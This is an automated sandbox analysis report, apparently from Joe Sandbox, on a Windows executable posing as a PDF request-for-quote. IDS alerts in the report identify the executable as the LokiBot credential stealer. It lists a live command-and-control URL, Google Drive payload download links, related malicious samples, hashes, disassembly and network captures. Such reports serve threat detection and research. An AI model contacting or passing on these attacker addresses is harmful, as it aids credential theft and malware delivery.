      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerApplication Window Discovery1SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol115SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsSystem Information Discovery4SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      RFQ 001030112021#U00b7pdf.exe17%MetadefenderBrowse
      RFQ 001030112021#U00b7pdf.exe18%ReversingLabsWin32.Backdoor.Androm

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      0.2.RFQ 001030112021#U00b7pdf.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File
      0.0.RFQ 001030112021#U00b7pdf.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File
      8.0.RFQ 001030112021#U00b7pdf.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File
      8.0.RFQ 001030112021#U00b7pdf.exe.400000.2.unpack100%AviraTR/Dropper.VB.GenDownload File
      8.0.RFQ 001030112021#U00b7pdf.exe.400000.1.unpack100%AviraTR/Dropper.VB.GenDownload File
      8.0.RFQ 001030112021#U00b7pdf.exe.400000.3.unpack100%AviraTR/Dropper.VB.GenDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://63.250.34.171/tickets.php?id=277N0%Avira URL Cloudsafe
      http://63.250.34.171/tickets.php?id=2779%VirustotalBrowse
      http://63.250.34.171/tickets.php?id=2770%Avira URL Cloudsafe
      https://csp.withgoogle.com/csp/report-to/gse_l9ocaq0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      		142.250.180.110
      		truefalse
        		high
        googlehosted.l.googleusercontent.com
        		216.58.198.33
        		truefalse
          		high
          doc-00-50-docs.googleusercontent.com
          		unknown
          		unknownfalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://63.250.34.171/tickets.php?id=277true
            • 9%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://doc-00-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/tmgkbuuoqg7e2eb3u8b2c66mt8m0nijc/1638356250000/03026244708369606156/*/1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb?e=downloadfalse
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://doc-00-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/tmgkbuuoRFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857244757.00000000009EB000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmpfalse
                		high
                http://63.250.34.171/tickets.php?id=277NRFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892182668.00000000009F2000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://doc-00-50-docs.googleusercontent.com/tRFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857351180.0000000000A33000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmpfalse
                  		high
                  https://drive.google.com/RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895453741.000000001E6F8000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892121972.0000000000987000.00000004.00000020.sdmpfalse
                    		high
                    https://doc-00-50-docs.googleusercontent.com/pRFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857351180.0000000000A33000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmpfalse
                      		high
                      https://doc-00-50-docs.googleusercontent.com/:RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892182668.00000000009F2000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmpfalse
                        		high
                        https://doc-00-50-docs.googleusercontent.com/RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmpfalse
                          		high
                          https://doc-00-50-docs.googleusercontent.com/)RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892182668.00000000009F2000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmpfalse
                            		high
                            https://csp.withgoogle.com/csp/report-to/gse_l9ocaqRFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            63.250.34.171
                            		unknownUnited States
                            		22612NAMECHEAP-NETUStrue
                            216.58.198.33
                            		googlehosted.l.googleusercontent.comUnited States
                            		15169GOOGLEUSfalse
                            142.250.180.110
                            		drive.google.comUnited States
                            		15169GOOGLEUSfalse

                            General Information

                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:531794
                            Start date:01.12.2021
                            Start time:11:55:11
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 6m 6s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:RFQ 001030112021#U00b7pdf.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:16
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.rans.troj.spyw.evad.winEXE@3/2@2/3
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 5.8% (good quality ratio 3.5%)
                            • Quality average: 32%
                            • Quality standard deviation: 30.7%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 23.211.6.115
                            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            11:57:52API Interceptor1x Sleep call for process: RFQ 001030112021#U00b7pdf.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            63.250.34.171Anexo I e II do convite#U00b7pdf.exeGet hashmaliciousBrowse
                            • 63.250.34.171/tickets.php?id=156
                            QfXk1qRIDN.exeGet hashmaliciousBrowse
                            • 63.250.34.171/tickets.php?id=537
                            P.I..xlsxGet hashmaliciousBrowse
                            • 63.250.34.171/tickets.php?id=537
                            Lkinv70923.exeGet hashmaliciousBrowse
                            • 63.250.34.171/tickets.php?id=550
                            ODkVvBA5vb.exeGet hashmaliciousBrowse
                            • 63.250.34.171/tickets.php?id=537
                            PROFORMA INVOICE.xlsxGet hashmaliciousBrowse
                            • 63.250.34.171/tickets.php?id=537
                            Product_Specification_Sheet.xlsxGet hashmaliciousBrowse
                            • 63.250.34.171/tickets.php?id=538
                            loader2.exeGet hashmaliciousBrowse
                            • 63.250.34.171/tickets.php?id=550
                            3MBqpjNC1q.exeGet hashmaliciousBrowse
                            • 63.250.34.171/tickets.php?id=537
                            Ship particulars.xlsxGet hashmaliciousBrowse
                            • 63.250.34.171/tickets.php?id=537
                            DHL Receipt_AWB8114704847788.exeGet hashmaliciousBrowse
                            • 63.250.34.171/tickets.php?id=552
                            HalkbankEkstre20211124073809405251,pdf.exeGet hashmaliciousBrowse
                            • 63.250.34.171/tickets.php?id=562
                            Order EnquiryCRM0754000001965-pdf(109KB).exeGet hashmaliciousBrowse
                            • 63.250.34.171/tickets.php?id=544

                            Domains

                            No context

                            ASN

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            NAMECHEAP-NETUSdraft_inv dec21.exeGet hashmaliciousBrowse
                            • 185.61.153.97
                            Overdue Invoice.exeGet hashmaliciousBrowse
                            • 198.54.117.215
                            SOA.exeGet hashmaliciousBrowse
                            • 37.61.238.59
                            Statement 12-01-2021.exeGet hashmaliciousBrowse
                            • 198.54.117.215
                            Sz4lxTmH7r.exeGet hashmaliciousBrowse
                            • 199.192.28.206
                            77isbA5bpi.exeGet hashmaliciousBrowse
                            • 198.54.117.218
                            REMITTANCE ADVICE.xlsxGet hashmaliciousBrowse
                            • 198.54.117.218
                            Sat#U0131n alma emri.exeGet hashmaliciousBrowse
                            • 162.0.239.47
                            ORDER N.42021.exeGet hashmaliciousBrowse
                            • 198.54.117.211
                            Anexo I e II do convite#U00b7pdf.exeGet hashmaliciousBrowse
                            • 63.250.34.171
                            Purchase Order.exeGet hashmaliciousBrowse
                            • 198.187.31.121
                            Linux_amd64Get hashmaliciousBrowse
                            • 198.54.115.142
                            Linux_x86Get hashmaliciousBrowse
                            • 185.61.153.120
                            hNfqWik7qw.exeGet hashmaliciousBrowse
                            • 198.54.117.244
                            RFQ...3463#.exeGet hashmaliciousBrowse
                            • 198.54.117.218
                            0cgyGHN5k8.exeGet hashmaliciousBrowse
                            • 198.54.117.211
                            QfXk1qRIDN.exeGet hashmaliciousBrowse
                            • 63.250.34.171
                            s8b4XYptUi.exeGet hashmaliciousBrowse
                            • 198.54.117.215
                            Dhl_AWB5032675620,pdf.exeGet hashmaliciousBrowse
                            • 198.54.121.168
                            ASEA METAL-PRODUCT LIST294#U007eMB - Copy.docGet hashmaliciousBrowse
                            • 198.54.117.211

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            37f463bf4616ecd445d4a1937da06e19item-107262298.xlsbGet hashmaliciousBrowse
                            • 216.58.198.33
                            • 142.250.180.110
                            products samples pdf.exeGet hashmaliciousBrowse
                            • 216.58.198.33
                            • 142.250.180.110
                            item-1202816963.xlsbGet hashmaliciousBrowse
                            • 216.58.198.33
                            • 142.250.180.110
                            draft_inv dec21.exeGet hashmaliciousBrowse
                            • 216.58.198.33
                            • 142.250.180.110
                            Nh3xqMPynb.exeGet hashmaliciousBrowse
                            • 216.58.198.33
                            • 142.250.180.110
                            #Encoder_n1.exeGet hashmaliciousBrowse
                            • 216.58.198.33
                            • 142.250.180.110
                            #Encoder_n2.exeGet hashmaliciousBrowse
                            • 216.58.198.33
                            • 142.250.180.110
                            iU17wh2uUd.exeGet hashmaliciousBrowse
                            • 216.58.198.33
                            • 142.250.180.110
                            iU17wh2uUd.exeGet hashmaliciousBrowse
                            • 216.58.198.33
                            • 142.250.180.110
                            counter-119221000.xlsGet hashmaliciousBrowse
                            • 216.58.198.33
                            • 142.250.180.110
                            PURCHASE ORDER.exeGet hashmaliciousBrowse
                            • 216.58.198.33
                            • 142.250.180.110
                            5243F620073F2AD7C464410D59B34794525CF6875498D.exeGet hashmaliciousBrowse
                            • 216.58.198.33
                            • 142.250.180.110
                            phish.htmGet hashmaliciousBrowse
                            • 216.58.198.33
                            • 142.250.180.110
                            box-1688169224.xlsbGet hashmaliciousBrowse
                            • 216.58.198.33
                            • 142.250.180.110
                            box-1689035414.xlsbGet hashmaliciousBrowse
                            • 216.58.198.33
                            • 142.250.180.110
                            html.htmlGet hashmaliciousBrowse
                            • 216.58.198.33
                            • 142.250.180.110
                            #Ud83d#Udce9-susan.hinds6459831.htmGet hashmaliciousBrowse
                            • 216.58.198.33
                            • 142.250.180.110
                            phish.htmGet hashmaliciousBrowse
                            • 216.58.198.33
                            • 142.250.180.110
                            OJypySurXg.exeGet hashmaliciousBrowse
                            • 216.58.198.33
                            • 142.250.180.110
                            f7Kudio57m.exeGet hashmaliciousBrowse
                            • 216.58.198.33
                            • 142.250.180.110

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                            Process:C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview: 1
                            C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                            Process:C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):46
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:D898504A722BFF1524134C6AB6A5EAA5
                            SHA1:E0FDC90C2CA2A0219C99D2758E68C18875A3E11E
                            SHA-256:878F32F76B159494F5A39F9321616C6068CDB82E88DF89BCC739BBC1EA78E1F9
                            SHA-512:26A4398BFFB0C0AEF9A6EC53CD3367A2D0ABF2F70097F711BBBF1E9E32FD9F1A72121691BB6A39EEB55D596EDD527934E541B4DEFB3B1426B1D1A6429804DC61
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview: ..............................................

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):5.965368386613768
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:RFQ 001030112021#U00b7pdf.exe
                            File size:115848
                            MD5:754fa9ff30ec6e1cd7a29837adeb7a8b
                            SHA1:09472c720424ab26d13b7dd8cc2e199a826a88d1
                            SHA256:957ac63b9471fe11ba63a0bca4759741b305525ef1c4a2e4be262ed4464a2935
                            SHA512:6336063e9eb21cb84d7fc19a89440ee3daa8d169fad56593874250a6056d768990dade8e0e6a460fe7cc18732ba1530032638f4fc67e168fd7dc13547afdf29a
                            SSDEEP:1536:Wgu1hdt0wzWlYifmvhLYQ0WrWiPI5DXGVl3C5Hj8BC94HfnjZvD:Wgu/4OiQ0IWcGD8tiDB2HrZL
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i...d...i.Rich..i.................PE..L......K.....................0....................@........................

                            File Icon

                            Icon Hash:20047c7c70f0e004

                            Static PE Info

                            General

                            Entrypoint:0x40131c
                            Entrypoint Section:.text
                            Digitally signed:true
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                            DLL Characteristics:
                            Time Stamp:0x4BED1892 [Fri May 14 09:32:02 2010 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:bee9d652e25bf42465265f6582df5734

                            Authenticode Signature

                            Signature Valid:false
                            Signature Issuer:E=Form_PATE@Form_Acoria.For, CN=Form_Cadd, OU=Form_Uddannel6, O=Form_Skinti, L=Form_Kabi, S=Form_Navi, C=AO
                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                            Error Number:-2146762487
                            Not Before, Not After
                            • 11/30/2021 8:18:37 AM 11/30/2022 8:18:37 AM
                            Subject Chain
                            • E=Form_PATE@Form_Acoria.For, CN=Form_Cadd, OU=Form_Uddannel6, O=Form_Skinti, L=Form_Kabi, S=Form_Navi, C=AO
                            Version:3
                            Thumbprint MD5:359B4CED88404A3FDA67CE83D420DD95
                            Thumbprint SHA-1:9D27A6445B658421E08629FAD425F379F07B3F1D
                            Thumbprint SHA-256:2D79E6E664C8C1FEBB518222BADCE0603E88D37057AB1A1A6ED41915F314FC18
                            Serial:00

                            Entrypoint Preview

                            Instruction
                            push 00401B00h
                            call 00007F5B5D02D9A3h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            inc eax
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ebx-3Eh], bh
                            enter F9ACh, B0h
                            inc ebp
                            inc ebx
                            mov bl, D2h
                            cmpsb
                            out 42h, al
                            cmp eax, 00003058h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax], eax
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            loopne 00007F5B5D02D97Ch
                            push ebx
                            add al, byte ptr [esi+6Fh]
                            jc 00007F5B5D02DA1Fh
                            pop edi
                            inc ebx
                            push 686B6375h
                            outsd
                            insb
                            xor eax, dword ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            dec esp
                            xor dword ptr [eax], eax
                            push es
                            sti
                            pop edx
                            mov al, byte ptr [3A59BAF9h]
                            dec edi
                            xchg dword ptr [edx+60568E27h], ecx
                            test eax, C0EDADC3h
                            loop 00007F5B5D02D974h
                            dec ebx
                            pop dword ptr [ebp-6Eh]
                            mov edx, BCC6D44Bh
                            pop ebp
                            xor dword ptr [edx], edi
                            dec edi
                            lodsd
                            xor ebx, dword ptr [ecx-48EE309Ah]
                            or al, 00h
                            stosb
                            add byte ptr [eax-2Dh], ah
                            xchg eax, ebx
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            dec ebx
                            add dword ptr [eax], eax
                            add byte ptr [ecx+00h], dl
                            add byte ptr [eax], al
                            add byte ptr [726F4600h], cl
                            insd
                            pop edi
                            dec ebp
                            outsd
                            outsb
                            outsd
                            jnc 00007F5B5D02DA21h
                            insd
                            xor dword ptr [eax], eax
                            or eax, 46000C01h

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x194f40x28.text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c0000x93d.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x1b0000x1488
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2200x20
                            IMAGE_DIRECTORY_ENTRY_IAT0x10000x140.text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x186ec0x19000False0.474736328125data6.06898584933IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            .data0x1a0000x1c140x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            .rsrc0x1c0000x93d0x1000False0.178466796875data2.05157572182IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountry
                            OK0x1c9180x25ASCII text, with CRLF line terminatorsEnglishUnited States
                            RT_ICON0x1c7e80x130data
                            RT_ICON0x1c5000x2e8data
                            RT_ICON0x1c3d80x128GLS_BINARY_LSB_FIRST
                            RT_GROUP_ICON0x1c3a80x30data
                            RT_VERSION0x1c1a00x208dataChineseTaiwan

                            Imports

                            DLLImport
                            MSVBVM60.DLLMethCallEngine, EVENT_SINK_AddRef, DllFunctionCall, EVENT_SINK_Release, EVENT_SINK_QueryInterface, __vbaExceptHandler

                            Version Infos

                            DescriptionData
                            Translation0x0404 0x04b0
                            ProductVersion1.00
                            InternalNameForm_Fejlfunkt
                            FileVersion1.00
                            OriginalFilenameForm_Fejlfunkt.exe
                            ProductNameForm_Chuckhole3

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States
                            ChineseTaiwan

                            Network Behavior

                            Snort IDS Alerts

                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            12/01/21-11:57:40.688250TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14980580192.168.2.463.250.34.171
                            12/01/21-11:57:40.688250TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.2.463.250.34.171
                            12/01/21-11:57:40.688250TCP2025381ET TROJAN LokiBot Checkin4980580192.168.2.463.250.34.171
                            12/01/21-11:57:40.688250TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24980580192.168.2.463.250.34.171
                            12/01/21-11:57:41.628362TCP1201ATTACK-RESPONSES 403 Forbidden804980563.250.34.171192.168.2.4
                            12/01/21-11:57:47.999523TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14982480192.168.2.463.250.34.171
                            12/01/21-11:57:47.999523TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982480192.168.2.463.250.34.171
                            12/01/21-11:57:47.999523TCP2025381ET TROJAN LokiBot Checkin4982480192.168.2.463.250.34.171
                            12/01/21-11:57:47.999523TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24982480192.168.2.463.250.34.171
                            12/01/21-11:57:49.049099TCP1201ATTACK-RESPONSES 403 Forbidden804982463.250.34.171192.168.2.4
                            12/01/21-11:57:52.652789TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.2.463.250.34.171
                            12/01/21-11:57:52.652789TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.2.463.250.34.171
                            12/01/21-11:57:52.652789TCP2025381ET TROJAN LokiBot Checkin4982580192.168.2.463.250.34.171
                            12/01/21-11:57:52.652789TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982580192.168.2.463.250.34.171
                            12/01/21-11:57:53.605790TCP1201ATTACK-RESPONSES 403 Forbidden804982563.250.34.171192.168.2.4

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Dec 1, 2021 11:57:37.763742924 CET49792443192.168.2.4142.250.180.110
                            Dec 1, 2021 11:57:37.763818979 CET44349792142.250.180.110192.168.2.4
                            Dec 1, 2021 11:57:37.765109062 CET49792443192.168.2.4142.250.180.110
                            Dec 1, 2021 11:57:37.788747072 CET49792443192.168.2.4142.250.180.110
                            Dec 1, 2021 11:57:37.788785934 CET44349792142.250.180.110192.168.2.4
                            Dec 1, 2021 11:57:37.862301111 CET44349792142.250.180.110192.168.2.4
                            Dec 1, 2021 11:57:37.862481117 CET49792443192.168.2.4142.250.180.110
                            Dec 1, 2021 11:57:37.863770962 CET44349792142.250.180.110192.168.2.4
                            Dec 1, 2021 11:57:37.863888979 CET49792443192.168.2.4142.250.180.110
                            Dec 1, 2021 11:57:38.119780064 CET49792443192.168.2.4142.250.180.110
                            Dec 1, 2021 11:57:38.119820118 CET44349792142.250.180.110192.168.2.4
                            Dec 1, 2021 11:57:38.120410919 CET44349792142.250.180.110192.168.2.4
                            Dec 1, 2021 11:57:38.120516062 CET49792443192.168.2.4142.250.180.110
                            Dec 1, 2021 11:57:38.130604029 CET49792443192.168.2.4142.250.180.110
                            Dec 1, 2021 11:57:38.172877073 CET44349792142.250.180.110192.168.2.4
                            Dec 1, 2021 11:57:38.589003086 CET44349792142.250.180.110192.168.2.4
                            Dec 1, 2021 11:57:38.589114904 CET44349792142.250.180.110192.168.2.4
                            Dec 1, 2021 11:57:38.589174032 CET49792443192.168.2.4142.250.180.110
                            Dec 1, 2021 11:57:38.589225054 CET49792443192.168.2.4142.250.180.110
                            Dec 1, 2021 11:57:38.599687099 CET49792443192.168.2.4142.250.180.110
                            Dec 1, 2021 11:57:38.599735022 CET44349792142.250.180.110192.168.2.4
                            Dec 1, 2021 11:57:38.707444906 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:38.707515001 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:38.707640886 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:38.708460093 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:38.708492994 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:38.782763958 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:38.782905102 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:38.783644915 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:38.783739090 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:38.793917894 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:38.793942928 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:38.794492006 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:38.794593096 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:38.795357943 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:38.836899996 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.001792908 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.001961946 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.003698111 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.003778934 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.005266905 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.005354881 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.008256912 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.008364916 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.008382082 CET44349796216.58.198.33192.168.2.4
